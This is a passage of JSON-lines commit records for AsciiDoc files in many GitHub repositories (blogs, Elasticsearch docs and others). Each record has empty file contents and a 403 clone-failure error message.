ticsearch,sneivandt\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,jimczi\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,shreejay\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,pozhidaevak\/elasticsearch,coding0011\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,vroyer\/elasticassandra,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch","old_file":"docs\/reference\/redirects.asciidoc","new_file":"docs\/reference\/redirects.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"649920f905f22089547d74327d9f23668c74818a","subject":"Update 2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","message":"Update 2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","new_file":"_posts\/2018-10-15-Docker-N-E-M-A-P-I-Account.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f52e9003c3371d6671824be0dc35752fb3e94041","subject":"Update 2017-08-15-IDE-Faster-IDE.adoc","message":"Update 2017-08-15-IDE-Faster-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-15-IDE-Faster-IDE.adoc","new_file":"_posts\/2017-08-15-IDE-Faster-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d29cb5f24ef24d378def7f1abf71d2e107393acb","subject":"Update 2015-07-31-Introduction.adoc","message":"Update 2015-07-31-Introduction.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-07-31-Introduction.adoc","new_file":"_posts\/2015-07-31-Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31faa2c17d08bb0595b6a6b773e1530b83e1d1b6","subject":"2016-07-06-quadruplexes.adoc","message":"2016-07-06-quadruplexes.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-06-quadruplexes.adoc","new_file":"_posts\/2016-07-06-quadruplexes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e08446c395113669b6733a873e34bb6915384d3a","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bcc00248cdab68764c34cd73d0662d0368d558e","subject":"Update 2016-12-20-Blog-Title.adoc","message":"Update 2016-12-20-Blog-Title.adoc","repos":"sxgc\/blog,sxgc\/blog,sxgc\/blog,sxgc\/blog","old_file":"_posts\/2016-12-20-Blog-Title.adoc","new_file":"_posts\/2016-12-20-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sxgc\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c63ebe03269c238535db9905d8c615b08578a101","subject":"Update 2017-01-14-First-post.adoc","message":"Update 2017-01-14-First-post.adoc","repos":"akoskovacsblog\/akoskovacsblog.github.io,akoskovacsblog\/akoskovacsblog.github.io,akoskovacsblog\/akoskovacsblog.github.io,akoskovacsblog\/akoskovacsblog.github.io","old_file":"_posts\/2017-01-14-First-post.adoc","new_file":"_posts\/2017-01-14-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/akoskovacsblog\/akoskovacsblog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c1ef3d8d09cc93cfdbcf70aaa8eac0565dcf253","subject":"Update 2017-02-01-A-Light-Poem.adoc","message":"Update 2017-02-01-A-Light-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-02-01-A-Light-Poem.adoc","new_file":"_posts\/2017-02-01-A-Light-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0029001c7f7c37632f8c41a6435c930b6ad2daa8","subject":"Update 2014-12-01-Inventing-a-Thing.adoc","message":"Update 2014-12-01-Inventing-a-Thing.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-12-01-Inventing-a-Thing.adoc","new_file":"_posts\/2014-12-01-Inventing-a-Thing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f2016046f624cd1a3b88f6aaefbc8d953f7ca28","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4489fbd3170c09c8c39e487fc04925562a23c16e","subject":"Update 2015-08-14-That-flag.adoc","message":"Update 2015-08-14-That-flag.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-08-14-That-flag.adoc","new_file":"_posts\/2015-08-14-That-flag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"246274311a40a9b6c3406435ac0c0fd37c93a580","subject":"Adding a new blog entry","message":"Adding a new blog entry\n","repos":"rhusar\/wildfly.org,luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org","old_file":"news\/2014-04-25-Getting-Started-WildFly-OpenShift.adoc","new_file":"news\/2014-04-25-Getting-Started-WildFly-OpenShift.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35bd414354aa8a043c4414a8acccb70674ea8f39","subject":"Added kata5 guide","message":"Added kata5 guide\n","repos":"Accordance\/microservice-dojo,Accordance\/microservice-dojo,Accordance\/microservice-dojo,Accordance\/microservice-dojo","old_file":"guides\/src\/kata5\/service_using_mongo_db.adoc","new_file":"guides\/src\/kata5\/service_using_mongo_db.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Accordance\/microservice-dojo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"148e2c1aed98318c2d082a8dad6c41491f1675d6","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70c2d983283791929aacd02c38a4fd7b11301b0f","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c10350f588db9dd6e69346fa1cc73e271b9ee2a","subject":"The task for the 4th lab","message":"The task for the 4th lab\n","repos":"slbedu\/javase8-2016","old_file":"lab04\/README.adoc","new_file":"lab04\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slbedu\/javase8-2016.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ae6260b4acd3786a9e6ef04174bd43096c34d81","subject":"add doc\/Roadmap.adoc","message":"add doc\/Roadmap.adoc\n","repos":"johnwalker\/datastore,migae\/datastore","old_file":"doc\/Roadmap.adoc","new_file":"doc\/Roadmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/johnwalker\/datastore.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b933214dcd718a19ac5a9a666883ed5b90e80441","subject":"[DOCS] Adding shared x-pack-settings file.","message":"[DOCS] Adding shared x-pack-settings file.\n\nOriginal commit: elastic\/x-pack-elasticsearch@2b74fab7728b58c981b20b6b0452640b57ad2142\n","repos":"scorpionvicky\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/en\/settings\/x-pack-settings.asciidoc","new_file":"docs\/en\/settings\/x-pack-settings.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"28f7e50d3d6c4408c5c2b3271767790d6f2e6fa3","subject":"Create 210.adoc","message":"Create 210.adoc","repos":"camunda\/camunda-bpm-spring-boot-starter,camunda\/camunda-spring-boot-starter,camunda\/camunda-spring-boot-starter","old_file":"docs\/src\/main\/asciidoc\/changelog\/210.adoc","new_file":"docs\/src\/main\/asciidoc\/changelog\/210.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camunda\/camunda-spring-boot-starter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05cab07be946ad70e9f70296c825721588b1250b","subject":"Update 2016-12-08-My-Development-Environment-Setup.adoc","message":"Update 2016-12-08-My-Development-Environment-Setup.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e6389753d4ad39bece316e260cd25a48bcef85f","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d31b34772cf3e9d5c8ecea600886760379d3936","subject":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","message":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de556ce3111bf15dd848f9151de726df1626390b","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a14775c4efb8f84d1b3fa9310790c5d68e99e073","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37e6d7bb2def18b124c9d09df203458e6bc5a937","subject":"Update 2016-05-20-Assumptions-driven-development.adoc","message":"Update 2016-05-20-Assumptions-driven-development.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-05-20-Assumptions-driven-development.adoc","new_file":"_posts\/2016-05-20-Assumptions-driven-development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87631198463c92b1ea59a3b6999ba4fc099527fb","subject":"Update 2016-01-12-Azure-performance-benchmark.adoc","message":"Update 2016-01-12-Azure-performance-benchmark.adoc","repos":"kim0\/hubpress.io,kim0\/hubpress.io,kim0\/hubpress.io","old_file":"_posts\/2016-01-12-Azure-performance-benchmark.adoc","new_file":"_posts\/2016-01-12-Azure-performance-benchmark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kim0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb92778d4ba7271ab18ed9f9a8af265a3ddf5db6","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38dc0be4c1eeb1ad26c386b446b77040b3c04dc8","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/07\/08\/deref.adoc","new_file":"content\/news\/2022\/07\/08\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"68863c8a85878861fb5badf8e0813cee24cf7ccc","subject":"Update 2019-01-26-true-source.adoc","message":"Update 2019-01-26-true-source.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-01-26-true-source.adoc","new_file":"_posts\/2019-01-26-true-source.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d34037d7dabd6531889c5fb44edd185c6dfcbb05","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84c325d502d8d41ecc7d22e861f8adb715069cda","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"022f0016119bbd0e5fb7aa5688de79cee8f63395","subject":"Update 2017-07-03-This-is-a-test-post.adoc","message":"Update 2017-07-03-This-is-a-test-post.adoc","repos":"TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io","old_file":"_posts\/2017-07-03-This-is-a-test-post.adoc","new_file":"_posts\/2017-07-03-This-is-a-test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TsungmingLiu\/tsungmingliu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f857d992230306a8e56f8abff1e28a68d9856c4d","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"60ddb8333a694b8d8de27a88ec814eeb63d1178c","subject":"Update 2016-06-13-Remember-me.adoc","message":"Update 2016-06-13-Remember-me.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-06-13-Remember-me.adoc","new_file":"_posts\/2016-06-13-Remember-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ac453988a65f4eff15e92eea64cab232b91b284","subject":"Update 2017-04-01-Prose-2-new.adoc","message":"Update 2017-04-01-Prose-2-new.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-01-Prose-2-new.adoc","new_file":"_posts\/2017-04-01-Prose-2-new.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a2131f8c1604bdcea31fc6342c05ec1bdb761bb","subject":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","message":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33969994cd7967f5554c1c57448059a7421571a9","subject":"Deleted _posts\/2016-03-18-Introduction-a-Bitcoin.adoc","message":"Deleted _posts\/2016-03-18-Introduction-a-Bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Introduction-a-Bitcoin.adoc","new_file":"_posts\/2016-03-18-Introduction-a-Bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2ee24bd093d80222e5739c96be78cf4f376bd1c","subject":"Update 2015-07-07-CoreText-part-1.adoc","message":"Update 2015-07-07-CoreText-part-1.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-07-07-CoreText-part-1.adoc","new_file":"_posts\/2015-07-07-CoreText-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9f7c98b1085573080dd3677ba468e429f1d8b8d","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91c72ff030c8daa638dec3138e834309ae81000a","subject":"docs: Add SELL_IT.adoc document (spacetec)","message":"docs: Add SELL_IT.adoc document (spacetec)\n","repos":"veeg\/disir-c,veeg\/disir-c","old_file":"doc\/SELL_IT.adoc","new_file":"doc\/SELL_IT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/veeg\/disir-c.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8a54510ba73db31b40657344627ca2be6960c138","subject":"Add a little bit of documentation about foldable.","message":"Add a little bit of documentation about foldable.\n","repos":"OlegTheCat\/cats,alesguzik\/cats,funcool\/cats,yurrriq\/cats,mccraigmccraig\/cats,tcsavage\/cats","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8c566dd73ffc5736afa457662726922a3b804368","subject":"Add firewall config notes for Bryn","message":"Add firewall config notes for Bryn\n","repos":"jflory7\/infrastructure,jflory7\/infrastructure","old_file":"docs\/bryn.adoc","new_file":"docs\/bryn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jflory7\/infrastructure.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"c3b658df8829bf5f33e5afb7537cb53186547434","subject":"[DOCS] Fixed broken link to put watch API","message":"[DOCS] Fixed broken link to put watch API\n\nOriginal commit: 